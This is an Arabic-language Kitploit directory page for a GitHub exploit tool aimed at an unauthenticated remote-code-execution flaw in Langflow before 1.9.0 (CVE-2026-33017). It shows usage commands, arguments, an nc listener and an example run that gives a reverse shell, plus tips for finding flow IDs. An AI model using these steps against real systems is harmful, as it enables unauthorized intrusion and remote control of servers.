Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-33017-Exploit — استغلال RCE غير موثقة في Langflow <1.9.0 (CVE-2026-33017) | Kitploit
أدوات/GitHubGitHub/diamorphine666/cve-2026-33017-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubdiamorphine666/cve-2026-33017-exploit

CVE-2026-33017-Exploit

استغلال RCE غير موثقة في Langflow <1.9.0 (CVE-2026-33017)

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

استغلال Fireflow لتنفيذ الأوامر عن بُعد

تنفيذ التعليمات البرمجية عن بُعد لـ Langflow عبر نقطة النهاية build_public_tmp.
استغلال عبر نقطة نهاية بناء التدفق العامة التي تنفذ شل عكسية على الهدف.

المتطلبات

  • Python 3.8+
  • مكتبة httpx

التثبيت:

root@kitploit:~
pip install httpx

الاستخدام

root@kitploit:~
python exploit.py -u <BASE_URL> -l <LHOST> -p <LPORT> --flow-id <FLOW_ID> --client-id <CLIENT_ID>

الوسائط

  • -u, --url : عنوان URL الأساسي لمثيل Langflow (مثال: https://flow.example.com/)
  • -l, --lhost : عنوان IP الخاص بك لاستقبال الشل العكسية
  • -p, --lport : منفذ الاستماع للشل العكسية
  • -f --flow-id : معرف التدفق الهدف (مطلوب – يتم الحصول عليه من /api/v1/flows/ أو من واجهة المستخدم)
  • -c --client-id : قيمة ملف تعريف الارتباط client_id لتحديد الجلسة

مثال

  1. ابدأ مستمعًا:

    root@kitploit:~
    nc -nlvp 9001
    
  2. قم بتشغيل الأداة:

    root@kitploit:~
    python exploit.py -u https://flow.target.local/ -l 127.0.0.1 -p 9001 --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 --client-id 8a6bf601-0263-480b-aa81-9a6389ca9e5d
    
  3. في حالة النجاح، ستحصل على شل باش تفاعلية.

ملاحظات مهمة

  • ReadTimeout طبيعي – قد لا يستجيب الخادم لأن الشل يحجب طلب HTTP. طالما رأيت اتصالاً على المستمع الخاص بك، فقد نجح الاستغلال.
  • مطلوب flow-id صالح. قم بسرد جميع التدفقات عبر GET /api/v1/flows أو انسخ من عنوان URL للمتصفح.
  • هذه الأداة موجهة لاختبار الاختراق المصرح به والأغراض التعليمية فقط. لا تستخدم ضد الأنظمة دون إذن صريح.

الإصدارات المتأثرة

  • إصدارات Langflow قبل إصلاح RCE للمكونات المخصصة <1.9.0

الترخيص

MIT – للبحث الأمني التعليمي والأخلاقي.

تنزيل الأداة